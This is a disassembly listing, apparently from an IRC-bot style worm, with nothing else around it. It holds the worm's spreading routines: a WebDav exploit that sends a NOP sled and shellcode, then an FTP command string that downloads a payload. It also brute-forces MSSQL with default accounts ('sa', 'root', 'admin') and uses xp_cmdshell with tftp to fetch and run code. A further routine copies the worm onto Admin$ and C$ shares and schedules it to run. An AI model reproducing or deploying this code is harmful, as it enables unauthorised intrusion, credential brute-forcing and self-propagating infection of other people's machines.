lea eax, [ebp-214h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4056FB
lea eax, [ebp-214h]
push eax
call sub_401EFF
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42B070[eax]
add esp, 2Ch
inc dword ptr [eax]
loc_4136CB: ; CODE XREF: .text:00413662�j
xor eax, eax
inc eax
loc_4136CE: ; CODE XREF: .text:00413603�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 8590h
call sub_414800
mov eax, ds:dword_428B9C
push ebx
push esi
mov [ebp-0Ch], eax
mov eax, ds:dword_428BA0
push edi
mov [ebp-8], eax
lea eax, [ebp+0Ch]
push 1
push eax
call sub_4039C6
test eax, eax
pop ecx
pop ecx
jz loc_413CBE
cmp eax, 1
jz loc_413CBE
cmp eax, 3
jnz short loc_41371C
and dword ptr [ebp-10h], 0
jmp short loc_413730
; ---------------------------------------------------------------------------
loc_41371C: ; CODE XREF: .text:00413714�j
call sub_4147A1
push 0Ah
cdq
pop ecx
idiv ecx
neg edx
sbb edx, edx
inc edx
inc edx
mov [ebp-10h], edx
loc_413730: ; CODE XREF: .text:0041371A�j
lea eax, [ebp+0Ch]
push eax
push offset aSIpc ; "\\\\%s\\ipc$"
lea eax, [ebp-58h]
push 28h
push eax
call sub_41483D
add esp, 10h
xor eax, eax
loc_413749: ; CODE XREF: .text:00413760�j
mov cl, [ebp+eax-58h]
and byte ptr [ebp+eax*2-11Fh], 0
mov [ebp+eax*2-120h], cl
inc eax
cmp eax, 28h
jl short loc_413749
push 18h
pop ecx
mov esi, offset dword_42D2C8
lea edi, [ebp-0D0h]
lea eax, [ebp-58h]
rep movsd
lea edx, [eax+1]
loc_413778: ; CODE XREF: .text:0041377D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413778
sub eax, edx
mov ecx, eax
lea esi, [ebp-120h]
lea edi, [ebp-0A0h]
lea eax, [ebp-58h]
rep movsw
lea ecx, [eax+1]
loc_413798: ; CODE XREF: .text:0041379D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413798
sub eax, ecx
lea edi, [ebp+eax*2-0A1h]
mov esi, (offset aC_5+3)
movsd
movsd
lea eax, [ebp-58h]
movsb
lea ecx, [eax+1]
loc_4137B6: ; CODE XREF: .text:004137BB�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4137B6
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp-1], al
mov [ebp-0CDh], al
lea eax, [ebp-58h]
lea ecx, [eax+1]
loc_4137D2: ; CODE XREF: .text:004137D7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4137D2
sub eax, ecx
shl al, 1
add al, 9
push 135h
mov [ebp-0A3h], al
call dword_435934 ; ntohs
mov ebx, [ebp-10h]
xor eax, 9999h
cmp ebx, 1
mov word_42CFC0, ax
jz short loc_41387D
cmp ebx, 2
jz short loc_41387D
mov eax, 90909090h
mov ecx, 1F4h
lea edi, [ebp-12C4h]
rep stosd
mov eax, offset loc_42CF10
mov ecx, eax
lea esi, [ecx+1]
loc_413824: ; CODE XREF: .text:00413829�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_413824
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-1224h]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-0Ch]
rep movsb
lea ecx, [eax+1]
loc_413849: ; CODE XREF: .text:0041384E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413849
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp-0Ch]
lea edi, [ebp-0B08h]
rep movsd
mov ecx, eax
and ecx, 3
imul ebx, 3Ch
mov eax, dword_42D708[ebx]
rep movsb
mov [ebp-0B18h], eax
jmp loc_41394F
; ---------------------------------------------------------------------------
loc_41387D: ; CODE XREF: .text:00413801�j
; .text:00413806�j
imul ebx, 3Ch
mov edx, dword_42D708[ebx]
mov eax, 90909090h
mov ecx, 36Bh
lea edi, [ebp-18A0h]
rep stosd
mov eax, offset loc_42CF10
mov ecx, eax
mov [ebp-10BCh], edx
lea esi, [ecx+1]
loc_4138A8: ; CODE XREF: .text:004138AD�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_4138A8
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp-10ACh]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov dword ptr [ebp-0D88h], 6EB06EBh
mov [ebp-0D84h], edx
lea esi, [ecx+1]
loc_4138DC: ; CODE XREF: .text:004138E1�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_4138DC
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-0D78h]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_4138FD: ; CODE XREF: .text:00413919�j
mov cl, [ebp+eax-18A0h]
and byte ptr [ebp+eax*2-43DFh], 0
mov [ebp+eax*2-43E0h], cl
inc eax
cmp eax, 0DACh
jl short loc_4138FD
and byte ptr [ebp-2888h], 0
and byte ptr [ebp-2887h], 0
mov edx, 714h
mov esi, 31313131h
mov ecx, edx
mov eax, esi
lea edi, [ebp-8590h]
rep stosd
stosw
mov ecx, edx
mov eax, esi
lea edi, [ebp-64B8h]
rep stosd
stosw
loc_41394F: ; CODE XREF: .text:00413878�j
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp-2884h]
rep stosd
xor ebx, ebx
push ebx
push 1
push 2
stosb
call dword_4357E8 ; socket
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
mov [ebp-8], esi
jz loc_413CC0
push dword ptr [ebp+12Ch]
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov word ptr [ebp-30h], 2
call dword_435934 ; ntohs
mov [ebp-2Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_43585C ; inet_addr
mov [ebp-2Ch], eax
push 10h
lea eax, [ebp-30h]
push eax
push esi
call dword_4357A0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_413CB7
push ebx
push 89h
push offset dword_42D0A8
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz loc_413CB7
push ebx
mov ebx, 640h
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43575C ; recv
xor edi, edi
push edi
push 0A8h
push offset dword_42D138
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz loc_413CB7
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43575C ; recv
push edi
push 0DEh
push offset dword_42D1E8
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz loc_413CB7
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43575C ; recv
movsx eax, byte ptr [ebp-1]
push edi
add eax, 4
push eax
lea eax, [ebp-0D0h]
push eax
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz loc_413CB7
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43575C ; recv
push edi
push 68h
push offset dword_42D330
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz loc_413CB7
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43575C ; recv
push edi
push 0A0h
push offset dword_42D3A0
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz loc_413CB7
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43575C ; recv
cmp dword ptr [ebp-10h], 1
jz short loc_413B38
cmp dword ptr [ebp-10h], 2
jz short loc_413B38
push 1Fh
pop ecx
mov esi, offset dword_42D448
lea edi, [ebp-2884h]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp-12C4h]
lea edi, [ebp-2808h]
rep movsd
pop ecx
push 0
push 0CF8h
lea eax, [ebp-2884h]
mov esi, offset off_42D4C8
lea edi, [ebp-2038h]
push eax
push dword ptr [ebp-8]
rep movsd
and byte ptr [ebp-1B8Dh], 0
loc_413B21: ; CODE XREF: .text:00413BD2�j
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jnz loc_413BD7
loc_413B30: ; CODE XREF: .text:00413BFB�j
push dword ptr [ebp-8]
jmp loc_413CB8
; ---------------------------------------------------------------------------
loc_413B38: ; CODE XREF: .text:00413ACE�j
; .text:00413AD4�j
push 1Ah
pop ecx
mov esi, offset dword_42D560
lea edi, [ebp-8590h]
rep movsd
mov ecx, 6D6h
lea esi, [ebp-43E0h]
lea edi, [ebp-8528h]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_42D5D0
lea edi, [ebp-64B8h]
rep movsd
mov ecx, 297h
lea esi, [ebp-334Ch]
lea edi, [ebp-6448h]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_42D648
lea edi, [ebp-5984h]
rep movsd
mov esi, [ebp-8]
xor edi, edi
push edi
push 10FCh
lea eax, [ebp-8590h]
push eax
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jz loc_413CB7
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43575C ; recv
push edi
push 0FDCh
lea eax, [ebp-64B8h]
push eax
push esi
jmp loc_413B21
; ---------------------------------------------------------------------------
loc_413BD7: ; CODE XREF: .text:00413B2A�j
push 0
push ebx
lea eax, [ebp-0AF0h]
push eax
push dword ptr [ebp-8]
call dword_43575C ; recv
push 6
push 1
push 2
call dword_4357E8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_413B30
xor eax, eax
lea edi, [ebp-20h]
stosd
stosd
stosd
stosd
push 135h
mov word ptr [ebp-20h], 2
call dword_435934 ; ntohs
mov [ebp-1Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_43585C ; inet_addr
mov [ebp-1Ch], eax
push 10h
lea eax, [ebp-20h]
push eax
push esi
call dword_4357A0 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_413C43
push dword ptr [ebp-8]
jmp short loc_413CB1
; ---------------------------------------------------------------------------
loc_413C43: ; CODE XREF: .text:00413C3C�j
xor edi, edi
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43575C ; recv
test eax, eax
jle short loc_413CBE
push 1F4h
call ds:dword_420000 ; Sleep
push dword ptr [ebp+9Ch]
lea eax, [ebp+1Ch]
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d>o&echo USER a>>o&echo a"...
lea eax, [ebp-2B0h]
push 190h
push eax
call sub_41483D
lea eax, [ebp-2B0h]
add esp, 14h
lea edx, [eax+1]
loc_413C90: ; CODE XREF: .text:00413C95�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413C90
push edi
sub eax, edx
push eax
lea eax, [ebp-2B0h]
push eax
push esi
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
push dword ptr [ebp-8]
jnz short loc_413CC5
loc_413CB1: ; CODE XREF: .text:00413C41�j
call dword_4358F4 ; closesocket
loc_413CB7: ; CODE XREF: .text:004139B9�j
; .text:004139D4�j ...
push esi
loc_413CB8: ; CODE XREF: .text:00413B33�j
call dword_4358F4 ; closesocket
loc_413CBE: ; CODE XREF: .text:00413702�j
; .text:0041370B�j ...
xor eax, eax
loc_413CC0: ; CODE XREF: .text:00413979�j
; .text:00413D47�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_413CC5: ; CODE XREF: .text:00413CAF�j
call dword_4358F4 ; closesocket
push esi
call dword_4358F4 ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSTryingToXploi ; "[%s]: Trying to Xploit IP: %s."
lea eax, [ebp-4B0h]
push 200h
push eax
call sub_41483D
add esp, 14h
cmp [ebp+140h], edi
jnz short loc_413D26
push edi
push dword ptr [ebp+13Ch]
lea eax, [ebp-4B0h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4056FB
add esp, 14h
loc_413D26: ; CODE XREF: .text:00413D04�j
lea eax, [ebp-4B0h]
push eax
call sub_401EFF
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42B070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
jmp loc_413CC0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0E30h
push ebx
xor ebx, ebx
lea eax, [ebp-14h]
push eax
push ebx
push 1
mov [ebp-1], bl
mov dword ptr [ebp-30h], offset aSa ; "sa"
mov dword ptr [ebp-2Ch], offset aRoot ; "root"
mov dword ptr [ebp-28h], offset aAdmin ; "admin"
mov [ebp-24h], ebx
mov [ebp-1Ch], ebx
mov [ebp-0Ch], ebx
mov [ebp-10h], ebx
call dword_43580C
test ax, ax
jnz short loc_413DA5
push 0FFFFFFFAh
push 3
push 0C8h
push dword ptr [ebp-14h]
call dword_4357A4
test ax, ax
jz short loc_413DAC
loc_413DA5: ; CODE XREF: .text:00413D8C�j
xor eax, eax
jmp loc_413FFA
; ---------------------------------------------------------------------------
loc_413DAC: ; CODE XREF: .text:00413DA3�j
push esi
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-14h]
push 2
call dword_43580C
test ax, ax
jz short loc_413DC8
xor esi, esi
jmp loc_413FEC
; ---------------------------------------------------------------------------
loc_413DC8: ; CODE XREF: .text:00413DBF�j
lea eax, [ebp-30h]
push edi
mov edi, ds:dword_420000
mov [ebp-8], eax
loc_413DD5: ; CODE XREF: .text:00413FDA�j
cmp dword_42C0C8, ebx
mov [ebp-18h], ebx
jz loc_413FC9
mov eax, offset dword_42C0C8
mov esi, eax
loc_413DEB: ; CODE XREF: .text:00413E65�j
lea ecx, [ebp-1]
push ecx
push dword ptr [eax]
mov eax, [ebp-8]
push dword ptr [eax]
lea eax, [ebp+0Ch]
push dword ptr [ebp+12Ch]
push eax
lea eax, [ebp-0A30h]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_4145E5
lea eax, [ebp-0A30h]
add esp, 1Ch
lea ecx, [eax+1]
loc_413E1D: ; CODE XREF: .text:00413E22�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_413E1D
push ebx
sub eax, ecx
lea ecx, [ebp-20h]
push ecx
push 400h
lea ecx, [ebp-0E30h]
push ecx
push eax
lea eax, [ebp-0A30h]
push eax
push ebx
push dword ptr [ebp-0Ch]
call dword_4358D4
cmp ax, bx
jz short loc_413E6C
cmp ax, 1
jz short loc_413E6C
push 1F4h
call edi ; Sleep
inc dword ptr [ebp-18h]
add esi, 4
cmp [esi], ebx
mov eax, esi
jnz short loc_413DEB
jmp loc_413FC9
; ---------------------------------------------------------------------------
loc_413E6C: ; CODE XREF: .text:00413E4C�j
; .text:00413E52�j
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-0Ch]
push 3
call dword_43580C
mov esi, offset byte_42BF44
push esi
push dword ptr [ebp+8]
call sub_407D51
pop ecx
push eax
lea eax, [ebp-630h]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
push eax
call sub_4145E5
add esp, 10h
push 0FFFFFFFDh
lea eax, [ebp-630h]
push eax
push dword ptr [ebp-10h]
call dword_4358EC
test ax, ax
jz loc_413FB5
push 1388h
call edi ; Sleep
push esi
lea eax, [ebp-630h]
push offset aExecMaster___0 ; "EXEC master..xp_cmdshell '%s'"
push eax
call sub_4145E5
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-230h]
push offset aTftpFileTran_1 ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_4145E5
add esp, 18h
xor esi, esi
loc_413EED: ; CODE XREF: .text:00413F20�j
lea eax, [ebp-230h]
push eax
call sub_401FDF
test eax, eax
pop ecx
jz short loc_413F15
push 0FFFFFFFDh
lea eax, [ebp-630h]
push eax
push dword ptr [ebp-10h]
call dword_4358EC
test ax, ax
jz short loc_413F27
loc_413F15: ; CODE XREF: .text:00413EFC�j
push 1388h
call edi ; Sleep
inc esi
cmp esi, 6
jl short loc_413EED
jmp loc_413FB5
; ---------------------------------------------------------------------------
loc_413F27: ; CODE XREF: .text:00413F13�j
mov eax, [ebp-18h]
push dword_42C0C8[eax*4]
mov eax, [ebp-8]
push dword ptr [eax]
lea eax, [ebp+0Ch]
push dword ptr [ebp+12Ch]
mov dword ptr [ebp-1Ch], 1
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingI_0 ; "[%s]: Exploiting IP: (%s:%d) User: (%s/"...
lea eax, [ebp-230h]
push 200h
push eax
call sub_41483D
add esp, 20h
cmp [ebp+140h], ebx
jnz short loc_413F97
push ebx
push dword ptr [ebp+13Ch]
lea eax, [ebp-230h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4056FB
add esp, 14h
loc_413F97: ; CODE XREF: .text:00413F75�j
lea eax, [ebp-230h]
push eax
call sub_401EFF
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42B070[eax]
inc dword ptr [eax]
pop ecx
loc_413FB5: ; CODE XREF: .text:00413EB4�j
; .text:00413F22�j
push dword ptr [ebp-0Ch]
call dword_4357B0
push dword ptr [ebp-10h]
push 3
call dword_435898
loc_413FC9: ; CODE XREF: .text:00413DDE�j
; .text:00413E67�j
mov esi, [ebp-1Ch]
cmp esi, 1
jz short loc_413FE0
add dword ptr [ebp-8], 4
mov eax, [ebp-8]
cmp [eax], ebx
jnz loc_413DD5
loc_413FE0: ; CODE XREF: .text:00413FCF�j
push dword ptr [ebp-0Ch]
push 2
call dword_435898
pop edi
loc_413FEC: ; CODE XREF: .text:00413DC3�j
push dword ptr [ebp-14h]
push 1
call dword_435898
mov eax, esi
pop esi
loc_413FFA: ; CODE XREF: .text:00413DA7�j
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FFD proc near ; CODE XREF: sub_414279+37�p
var_6F0 = byte ptr -6F0h
var_4E8 = byte ptr -4E8h
var_2E8 = byte ptr -2E8h
var_15D = byte ptr -15Dh
var_158 = byte ptr -158h
var_54 = byte ptr -54h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_A4 = byte ptr 0ACh
arg_138 = dword ptr 140h
arg_140 = dword ptr 148h
arg_144 = dword ptr 14Ch
push ebp
mov ebp, esp
sub esp, 6F0h
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
push 8
pop ecx
xor ebx, ebx
push ebx
push [ebp+arg_0]
xor eax, eax
push [ebp+arg_4]
lea edi, [ebp+var_54]
rep stosd
lea eax, [ebp+var_54]
push eax
mov [ebp+var_40], esi
mov [ebp+var_50], 1
mov [ebp+var_44], ebx
mov [ebp+var_38], ebx
call dword_435888
test eax, eax
jz short loc_41404A
push 0Ah
call ds:dword_420000 ; Sleep
jmp loc_414265
; ---------------------------------------------------------------------------
loc_41404A: ; CODE XREF: sub_413FFD+3E�j
push 190h
lea eax, [ebp+var_2E8]
push eax
push 0FFFFFFFFh
push esi
push ebx
push ebx
mov [ebp+var_20], offset aAdminSystem32 ; "Admin$\\system32"
mov [ebp+var_1C], offset aCWinntSystem32 ; "c$\\winnt\\system32"
mov [ebp+var_18], offset aCWindowsSystem ; "c$\\windows\\system32"
mov [ebp+var_14], offset aC ; "c"
mov [ebp+var_10], offset aD ; "d"
mov [ebp+var_8], ebx
call ds:dword_4200D4 ; MultiByteToWideChar
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2E8]
push eax
call dword_435764
test eax, eax
jnz loc_414262
cmp [ebp+var_8], ebx
jz loc_414262
mov edi, ds:dword_4200FC
mov [ebp+var_4], ebx
mov esi, offset byte_42BF44
loc_4140B7: ; CODE XREF: sub_413FFD+14F�j
mov eax, [ebp+var_4]
push esi
push [ebp+eax*4+var_20]
lea eax, [ebp+var_158]
push [ebp+arg_8]
push offset aSSS_3 ; "%s\\%s\\%s"
push eax
call sub_4145E5
add esp, 14h
push ebx
lea eax, [ebp+var_158]
push eax
push esi
call edi ; CopyFileA
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_414165
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 5
jnz short loc_414145
lea eax, [ebp+var_158]
push ebx
push eax
call sub_414F14
test eax, eax
pop ecx
pop ecx
jnz short loc_414145
lea eax, [ebp+var_158]
lea edx, [eax+1]
loc_41410F: ; CODE XREF: sub_413FFD+117�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41410F
sub eax, edx
mov [ebp+var_C], eax
call sub_4147A1
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_C]
push ebx
add dl, 30h
mov [ebp+eax+var_15D], dl
lea eax, [ebp+var_158]
push eax
push esi
call edi ; CopyFileA
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_414165
loc_414145: ; CODE XREF: sub_413FFD+F4�j
; sub_413FFD+107�j
inc [ebp+var_4]
cmp [ebp+var_4], 5
jb loc_4140B7
cmp [ebp+var_C], ebx
jnz short loc_414165
push [ebp+var_8]
call dword_435820
jmp loc_414265
; ---------------------------------------------------------------------------
loc_414165: ; CODE XREF: sub_413FFD+E9�j
; sub_413FFD+146�j ...
mov ecx, [ebp+var_8]
mov eax, [ecx]
push 3Ch
pop edi
xor edx, edx
div edi
xor edx, edx
lea edi, [ebp+var_34]
push 208h
sub eax, [ecx+18h]
mov ecx, 5A0h
inc eax
inc eax
div ecx
xor eax, eax
stosd
stosd
stosd
stosd
lea eax, [ebp+var_6F0]
push eax
push 0FFFFFFFFh
push esi
push ebx
push ebx
imul edx, 0EA60h
mov [ebp+var_34], edx
call ds:dword_4200D4 ; MultiByteToWideChar
lea eax, [ebp+var_6F0]
mov [ebp+var_28], eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2E8]
push eax
call dword_43579C
test eax, eax
jnz loc_414262
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov edi, 420AEAh
mov esi, eax
xor edx, edx
repe cmpsb
jnz short loc_4141E6
mov eax, offset aNoPassword ; "(no password)"
loc_4141E6: ; CODE XREF: sub_413FFD+1E2�j
push eax
push [ebp+arg_0]
mov eax, [ebp+var_4]
push [ebp+eax*4+var_20]
mov eax, [ebp+arg_138]
push [ebp+arg_8]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingI_1 ; "[%s]: Exploiting IP: %s, Share: \\%s, Us"...
lea eax, [ebp+var_4E8]
push 200h
push eax
call sub_41483D
add esp, 20h
cmp [ebp+arg_144], ebx
jnz short loc_414244
push ebx
push [ebp+arg_140]
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+arg_A4]
push eax
push [ebp+arg_C]
call sub_4056FB
add esp, 14h
loc_414244: ; CODE XREF: sub_413FFD+225�j
lea eax, [ebp+var_4E8]
push eax
call sub_401EFF
mov eax, [ebp+arg_138]
imul eax, 3Ch
lea eax, dword_42B070[eax]
inc dword ptr [eax]
pop ecx
loc_414262: ; CODE XREF: sub_413FFD+9D�j
; sub_413FFD+A6�j ...
xor ebx, ebx
inc ebx
loc_414265: ; CODE XREF: sub_413FFD+48�j
; sub_413FFD+163�j
push 1
push 1
push [ebp+arg_8]
call dword_4357C4
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_413FFD endp
; =============== S U B R O U T I N E =======================================
sub_414279 proc near ; CODE XREF: .text:00414411�p
; .text:00414488�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
cmp dword_42C0C8, 0
push ebx
push esi
push edi
jz short loc_4142D5
mov eax, offset dword_42C0C8
mov ebx, eax
loc_41428C: ; CODE XREF: sub_414279+5A�j
sub esp, 140h
push 50h
pop ecx
mov edi, esp
push [esp+14Ch+arg_4]
lea esi, [esp+150h+arg_8]
push dword ptr [eax]
rep movsd
push [esp+154h+arg_0]
call sub_413FFD
add esp, 14Ch
cmp eax, 1
jz short loc_4142DB
push 0C8h
call ds:dword_420000 ; Sleep
add ebx, 4
cmp dword ptr [ebx], 0
mov eax, ebx
jnz short loc_41428C
loc_4142D5: ; CODE XREF: sub_414279+A�j
xor eax, eax
loc_4142D7: ; CODE XREF: sub_414279+65�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4142DB: ; CODE XREF: sub_414279+45�j
xor eax, eax
inc eax
jmp short loc_4142D7
sub_414279 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 62Ch
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push eax
xor ebx, ebx
lea eax, [ebp-30h]
push offset aS_6 ; "\\\\%s"
push eax
mov [ebp-4], ebx
mov [ebp-14h], ebx
mov [ebp-1Ch], ebx
mov [ebp-18h], ebx
call sub_4145E5
add esp, 0Ch
push 3E8h
lea eax, [ebp-62Ch]
push eax
push 0FFFFFFFFh
lea eax, [ebp-30h]
push eax
push ebx
push ebx
call ds:dword_4200D4 ; MultiByteToWideChar
lea eax, [ebp-30h]
push eax
lea eax, [ebp-118h]
push offset aSIpc_0 ; "%s\\ipc$"
push eax
mov [ebp-40h], ebx
mov [ebp-34h], ebx
mov [ebp-4Ch], ebx
call sub_4145E5
add esp, 0Ch
lea eax, [ebp-118h]
mov [ebp-3Ch], eax
push ebx
mov eax, 420AEAh
push eax
push eax
lea eax, [ebp-50h]
push eax
call dword_435888
test eax, eax
jz short loc_414380
push 1
push ebx
lea eax, [ebp-118h]
push eax
call dword_4357C4
xor eax, eax
jmp loc_4144A8
; ---------------------------------------------------------------------------
loc_414380: ; CODE XREF: .text:00414367�j
; .text:00414448�j
lea eax, [ebp-18h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-14h]
push eax
push 0FFFFFFFFh
lea eax, [ebp-4]
push eax
push 2
push ebx
lea eax, [ebp-62Ch]
push eax
call dword_4357C8
push 1
mov [ebp-0Ch], eax
push ebx
lea eax, [ebp-118h]
push eax
call dword_4357C4
cmp [ebp-0Ch], ebx
jz short loc_4143C3
cmp dword ptr [ebp-0Ch], 0EAh
jnz short loc_414430
loc_4143C3: ; CODE XREF: .text:004143B8�j
mov eax, [ebp-4]
cmp eax, ebx
mov [ebp-10h], eax
jz short loc_414441
cmp [ebp-14h], ebx
mov [ebp-8], ebx
jbe short loc_414430
loc_4143D5: ; CODE XREF: .text:0041442E�j
mov eax, [ebp-10h]
cmp eax, ebx
jz short loc_414430
push ebx
push ebx
push 12Ch
lea ecx, [ebp-244h]
push ecx
push 0FFFFFFFFh
push dword ptr [eax]
push ebx
push ebx
call ds:dword_4200D8 ; WideCharToMultiByte
sub esp, 140h
push 50h
pop ecx
mov edi, esp
lea eax, [ebp-30h]
push eax
lea eax, [ebp-244h]
lea esi, [ebp+8]
push eax
rep movsd
call sub_414279
add esp, 148h
cmp eax, 1
jz short loc_414430
add dword ptr [ebp-10h], 4
inc dword ptr [ebp-8]
mov eax, [ebp-8]
cmp eax, [ebp-14h]
jb short loc_4143D5
loc_414430: ; CODE XREF: .text:004143C1�j
; .text:004143D3�j ...
cmp [ebp-4], ebx
jz short loc_414441
push dword ptr [ebp-4]
call dword_435820
mov [ebp-4], ebx
loc_414441: ; CODE XREF: .text:004143CB�j
; .text:00414433�j
cmp dword ptr [ebp-0Ch], 0EAh
jz loc_414380
cmp [ebp-4], ebx
jz short loc_41445C
push dword ptr [ebp-4]
call dword_435820
loc_41445C: ; CODE XREF: .text:00414451�j
cmp dword ptr [ebp-0Ch], 5
jnz short loc_4144A5
cmp off_42C078, ebx
jz short loc_4144A5
mov eax, offset off_42C078
mov [ebp-8], eax
loc_414472: ; CODE XREF: .text:004144A3�j
sub esp, 140h
push 50h
pop ecx
mov edi, esp
lea esi, [ebp+8]
rep movsd
lea ecx, [ebp-30h]
push ecx
push dword ptr [eax]
call sub_414279
add esp, 148h
cmp eax, 1
jz short loc_4144A5
mov eax, [ebp-8]
add eax, 4
cmp [eax], ebx
mov [ebp-8], eax
jnz short loc_414472
loc_4144A5: ; CODE XREF: .text:00414460�j
; .text:00414468�j ...
xor eax, eax
inc eax
loc_4144A8: ; CODE XREF: .text:0041437B�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4144B0 proc near ; CODE XREF: sub_401000+5C�p
; sub_401000+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_414574
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_4144DC
loc_4144CB: ; CODE XREF: sub_4144B0+2A�j
mov al, [edi]
add edi, 1
test al, al
jz short loc_41450D
test edi, 3
jnz short loc_4144CB
loc_4144DC: ; CODE XREF: sub_4144B0+19�j
; sub_4144B0+42�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
